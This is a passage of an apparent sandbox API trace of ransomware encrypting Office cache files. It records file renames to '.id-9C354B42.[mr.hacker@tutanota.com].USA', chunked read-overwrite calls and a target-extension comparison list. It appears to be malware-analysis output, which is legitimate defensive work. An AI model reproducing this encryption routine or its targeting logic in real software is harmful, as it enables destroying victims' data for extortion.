Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ec [0045.407] GetFileSizeEx (in: hFile=0x1ec, lpFileSize=0x375ff1c | out: lpFileSize=0x375ff1c*=2797568) returned 1 [0045.407] CloseHandle (hObject=0x1ec) returned 1 [0045.407] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.msi")) returned 0x2020 [0045.407] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.msi.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0045.407] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.msi"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.msi.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 1 [0045.408] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.msi.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ec [0045.408] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fc6c | out: lpNewFilePointer=0x0) returned 1 [0045.408] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fc2c | out: lpNewFilePointer=0x0) returned 1 [0045.408] ReadFile (in: hFile=0x1ec, lpBuffer=0x3de0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x375fc38, lpOverlapped=0x0 | out: lpBuffer=0x3de0058*, lpNumberOfBytesRead=0x375fc38*=0x40000, lpOverlapped=0x0) returned 1 [0045.419] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0xe3aaa, lpNewFilePointer=0x0, dwMoveMethod=0x375fc2c | out: lpNewFilePointer=0x0) returned 1 [0045.419] ReadFile (in: hFile=0x1ec, lpBuffer=0x3e20058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x375fc38, lpOverlapped=0x0 | out: lpBuffer=0x3e20058*, lpNumberOfBytesRead=0x375fc38*=0x40000, lpOverlapped=0x0) returned 1 [0045.428] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x375fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0045.428] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0x26b000, lpNewFilePointer=0x0, dwMoveMethod=0x375fc2c | out: lpNewFilePointer=0x0) returned 1 [0045.428] ReadFile (in: hFile=0x1ec, lpBuffer=0x3e60058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x375fc38, lpOverlapped=0x0 | out: lpBuffer=0x3e60058*, lpNumberOfBytesRead=0x375fc38*=0x40000, lpOverlapped=0x0) returned 1 [0045.529] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.529] WriteFile (in: hFile=0x1ec, lpBuffer=0x3de0020*, nNumberOfBytesToWrite=0xc0104, lpNumberOfBytesWritten=0x375fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3de0020*, lpNumberOfBytesWritten=0x375fcb0*=0xc0104, lpOverlapped=0x0) returned 1 [0045.682] SetEndOfFile (hFile=0x1ec) returned 1 [0045.682] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x40000) returned 0x3fb70b8 [0045.685] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fc7c | out: lpNewFilePointer=0x0) returned 1 [0045.685] WriteFile (in: hFile=0x1ec, lpBuffer=0x3fb70b8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x375fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fb70b8*, lpNumberOfBytesWritten=0x375fc88*=0x40000, lpOverlapped=0x0) returned 1 [0045.686] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0xe3aaa, lpNewFilePointer=0x0, dwMoveMethod=0x375fc7c | out: lpNewFilePointer=0x0) returned 1 [0045.686] WriteFile (in: hFile=0x1ec, lpBuffer=0x3fb70b8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x375fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fb70b8*, lpNumberOfBytesWritten=0x375fc88*=0x40000, lpOverlapped=0x0) returned 1 [0045.692] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0x26b000, lpNewFilePointer=0x0, dwMoveMethod=0x375fc7c | out: lpNewFilePointer=0x0) returned 1 [0045.692] WriteFile (in: hFile=0x1ec, lpBuffer=0x3fb70b8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x375fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fb70b8*, lpNumberOfBytesWritten=0x375fc88*=0x40000, lpOverlapped=0x0) returned 1 [0045.694] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3fb70b8 | out: hHeap=0x5d0000) returned 1 [0045.694] CloseHandle (hObject=0x1ec) returned 1 [0045.694] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x2020) returned 1 [0045.694] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi") returned 75 [0045.694] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi") returned 75 [0045.694] lstrlenW (lpString=".doc") returned 4 [0045.694] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0045.694] lstrlenW (lpString=".docx") returned 5 [0045.694] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1 [0045.694] lstrlenW (lpString=".pdf") returned 4 [0045.694] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0045.694] lstrlenW (lpString=".xls") returned 4 [0045.694] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0045.694] lstrlenW (lpString=".xlsx") returned 5 [0045.694] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1 [0045.694] lstrlenW (lpString=".ppt") returned 4 [0045.695] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0045.695] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi") returned 75 [0045.695] lstrlenW (lpString=".zip") returned 4 [0045.695] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0045.695] lstrlenW (lpString=".rar") returned 4 [0045.695] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0045.695] lstrlenW (lpString=".bz2") returned 4 [0045.695] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0045.695] lstrlenW (lpString=".7z") returned 3 [0045.695] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0045.695] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi") returned 75 [0045.695] lstrlenW (lpString=".dbf") returned 4 [0045.695] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0045.695] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi") returned 75 [0045.695] lstrlenW (lpString=".1cd") returned 4 [0045.695] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0045.695] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi") returned 75 [0045.695] lstrlenW (lpString=".jpg") returned 4 [0045.695] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0045.695] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi") returned 75 [0045.695] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi") returned 75 [0045.695] lstrlenW (lpString=".doc") returned 4 [0045.695] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0045.695] lstrlenW (lpString=".docx") returned 5 [0045.695] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1 [0045.695] lstrlenW (lpString=".pdf") returned 4 [0045.695] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0045.695] lstrlenW (lpString=".xls") returned 4 [0045.695] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0045.695] lstrlenW (lpString=".xlsx") returned 5 [0045.695] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1 [0045.695] lstrlenW (lpString=".ppt") returned 4 [0045.695] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0045.695] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi") returned 75 [0045.695] lstrlenW (lpString=".zip") returned 4 [0045.696] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0045.696] lstrlenW (lpString=".rar") returned 4 [0045.696] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0045.696] lstrlenW (lpString=".bz2") returned 4 [0045.696] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0045.696] lstrlenW (lpString=".7z") returned 3 [0045.696] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0045.696] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi") returned 75 [0045.696] lstrlenW (lpString=".dbf") returned 4 [0045.696] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0045.696] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi") returned 75 [0045.696] lstrlenW (lpString=".1cd") returned 4 [0045.696] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0045.696] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi") returned 75 [0045.696] lstrlenW (lpString=".jpg") returned 4 [0045.696] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0045.696] lstrcmpiW (lpString1=".cab", lpString2=".USA") returned -1 [0045.696] lstrlenW (lpString="OnoteLR.cab") returned 11 [0045.696] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onotelr.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ec [0045.696] GetFileSizeEx (in: hFile=0x1ec, lpFileSize=0x375ff1c | out: lpFileSize=0x375ff1c*=17456632) returned 1 [0045.696] CloseHandle (hObject=0x1ec) returned 1 [0045.697] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onotelr.cab")) returned 0x2020 [0045.697] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onotelr.cab.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0045.697] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onotelr.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onotelr.cab.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 1 [0045.697] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onotelr.cab.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ec [0045.697] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fc6c | out: lpNewFilePointer=0x0) returned 1 [0045.697] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fc2c | out: lpNewFilePointer=0x0) returned 1 [0045.697] ReadFile (in: hFile=0x1ec, lpBuffer=0x3de0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x375fc38, lpOverlapped=0x0 | out: lpBuffer=0x3de0058*, lpNumberOfBytesRead=0x375fc38*=0x40000, lpOverlapped=0x0) returned 1 [0046.092] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0x58c9fd, lpNewFilePointer=0x0, dwMoveMethod=0x375fc2c | out: lpNewFilePointer=0x0) returned 1 [0046.092] ReadFile (in: hFile=0x1ec, lpBuffer=0x3e20058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x375fc38, lpOverlapped=0x0 | out: lpBuffer=0x3e20058*, lpNumberOfBytesRead=0x375fc38*=0x40000, lpOverlapped=0x0) returned 1 [0046.114] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x375fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0046.114] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0x1065df8, lpNewFilePointer=0x0, dwMoveMethod=0x375fc2c | out: lpNewFilePointer=0x0) returned 1 [0046.114] ReadFile (in: hFile=0x1ec, lpBuffer=0x3e60058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x375fc38, lpOverlapped=0x0 | out: lpBuffer=0x3e60058*, lpNumberOfBytesRead=0x375fc38*=0x40000, lpOverlapped=0x0) returned 1 [0046.146] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.146] WriteFile (in: hFile=0x1ec, lpBuffer=0x3de0020*, nNumberOfBytesToWrite=0xc0102, lpNumberOfBytesWritten=0x375fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3de0020*, lpNumberOfBytesWritten=0x375fcb0*=0xc0102, lpOverlapped=0x0) returned 1 [0046.333] SetEndOfFile (hFile=0x1ec) returned 1 [0046.333] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x40000) returned 0x3fb70b8 [0046.336] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fc7c | out: lpNewFilePointer=0x0) returned 1 [0046.336] WriteFile (in: hFile=0x1ec, lpBuffer=0x3fb70b8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x375fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fb70b8*, lpNumberOfBytesWritten=0x375fc88*=0x40000, lpOverlapped=0x0) returned 1 [0046.337] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0x58c9fd, lpNewFilePointer=0x0, dwMoveMethod=0x375fc7c | out: lpNewFilePointer=0x0) returned 1 [0046.337] WriteFile (in: hFile=0x1ec, lpBuffer=0x3fb70b8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x375fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fb70b8*, lpNumberOfBytesWritten=0x375fc88*=0x40000, lpOverlapped=0x0) returned 1 [0046.338] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0x1065df8, lpNewFilePointer=0x0, dwMoveMethod=0x375fc7c | out: lpNewFilePointer=0x0) returned 1 [0046.338] WriteFile (in: hFile=0x1ec, lpBuffer=0x3fb70b8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x375fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fb70b8*, lpNumberOfBytesWritten=0x375fc88*=0x40000, lpOverlapped=0x0) returned 1 [0046.340] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3fb70b8 | out: hHeap=0x5d0000) returned 1 [0046.340] CloseHandle (hObject=0x1ec) returned 1 [0046.340] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x2020) returned 1 [0046.340] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab") returned 74 [0046.340] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab") returned 74 [0046.340] lstrlenW (lpString=".doc") returned 4 [0046.340] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0046.341] lstrlenW (lpString=".docx") returned 5 [0046.341] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1 [0046.341] lstrlenW (lpString=".pdf") returned 4 [0046.341] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0046.341] lstrlenW (lpString=".xls") returned 4 [0046.341] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0046.341] lstrlenW (lpString=".xlsx") returned 5 [0046.341] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1 [0046.341] lstrlenW (lpString=".ppt") returned 4 [0046.341] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0046.341] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab") returned 74 [0046.341] lstrlenW (lpString=".zip") returned 4 [0046.341] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0046.341] lstrlenW (lpString=".rar") returned 4 [0046.341] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0046.341] lstrlenW (lpString=".bz2") returned 4 [0046.341] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0046.341] lstrlenW (lpString=".7z") returned 3 [0046.341] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0046.341] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab") returned 74 [0046.341] lstrlenW (lpString=".dbf") returned 4 [0046.341] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0046.341] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab") returned 74 [0046.341] lstrlenW (lpString=".1cd") returned 4 [0046.341] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0046.341] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab") returned 74 [0046.341] lstrlenW (lpString=".jpg") returned 4 [0046.341] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0046.341] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab") returned 74 [0046.341] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab") returned 74 [0046.341] lstrlenW (lpString=".doc") returned 4 [0046.341] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0046.341] lstrlenW (lpString=".docx") returned 5 [0046.341] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1 [0046.341] lstrlenW (lpString=".pdf") returned 4 [0046.341] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0046.342] lstrlenW (lpString=".xls") returned 4 [0046.342] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0046.342] lstrlenW (lpString=".xlsx") returned 5 [0046.342] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1 [0046.342] lstrlenW (lpString=".ppt") returned 4 [0046.342] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0046.342] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab") returned 74 [0046.342] lstrlenW (lpString=".zip") returned 4 [0046.342] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0046.342] lstrlenW (lpString=".rar") returned 4 [0046.342] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0046.342] lstrlenW (lpString=".bz2") returned 4 [0046.342] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0046.342] lstrlenW (lpString=".7z") returned 3 [0046.342] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0046.342] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab") returned 74 [0046.342] lstrlenW (lpString=".dbf") returned 4 [0046.342] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0046.342] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab") returned 74 [0046.342] lstrlenW (lpString=".1cd") returned 4 [0046.342] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0046.342] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab") returned 74 [0046.342] lstrlenW (lpString=".jpg") returned 4 [0046.342] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0046.342] lstrcmpiW (lpString1=".cab", lpString2=".USA") returned -1 [0046.342] lstrlenW (lpString="GrooveLR.cab") returned 12 [0046.342] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovelr.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ec [0046.343] GetFileSizeEx (in: hFile=0x1ec, lpFileSize=0x375ff1c | out: lpFileSize=0x375ff1c*=4095519) returned 1 [0046.343] CloseHandle (hObject=0x1ec) returned 1 [0046.343] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovelr.cab")) returned 0x2020 [0046.343] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovelr.cab.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0046.343] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovelr.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovelr.cab.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 1 [0046.343] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovelr.cab.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ec [0046.343] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fc6c | out: lpNewFilePointer=0x0) returned 1 [0046.343] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fc2c | out: lpNewFilePointer=0x0) returned 1 [0046.344] ReadFile (in: hFile=0x1ec, lpBuffer=0x3de0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x375fc38, lpOverlapped=0x0 | out: lpBuffer=0x3de0058*, lpNumberOfBytesRead=0x375fc38*=0x40000, lpOverlapped=0x0) returned 1 [0046.347] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0x14d4b5, lpNewFilePointer=0x0, dwMoveMethod=0x375fc2c | out: lpNewFilePointer=0x0) returned 1 [0046.348] ReadFile (in: hFile=0x1ec, lpBuffer=0x3e20058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x375fc38, lpOverlapped=0x0 | out: lpBuffer=0x3e20058*, lpNumberOfBytesRead=0x375fc38*=0x40000, lpOverlapped=0x0) returned 1 [0046.351] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x375fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0046.352] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0x3a7e1f, lpNewFilePointer=0x0, dwMoveMethod=0x375fc2c | out: lpNewFilePointer=0x0) returned 1 [0046.352] ReadFile (in: hFile=0x1ec, lpBuffer=0x3e60058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x375fc38, lpOverlapped=0x0 | out: lpBuffer=0x3e60058*, lpNumberOfBytesRead=0x375fc38*=0x40000, lpOverlapped=0x0) returned 1 [0046.366] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.366] WriteFile (in: hFile=0x1ec, lpBuffer=0x3de0020*, nNumberOfBytesToWrite=0xc0104, lpNumberOfBytesWritten=0x375fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3de0020*, lpNumberOfBytesWritten=0x375fcb0*=0xc0104, lpOverlapped=0x0) returned 1 [0046.647] SetEndOfFile (hFile=0x1ec) returned 1 [0046.647] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x40000) returned 0x40070c8 [0046.651] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fc7c | out: lpNewFilePointer=0x0) returned 1 [0046.651] WriteFile (in: hFile=0x1ec, lpBuffer=0x40070c8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x375fc88, lpOverlapped=0x0 | out: lpBuffer=0x40070c8*, lpNumberOfBytesWritten=0x375fc88*=0x40000, 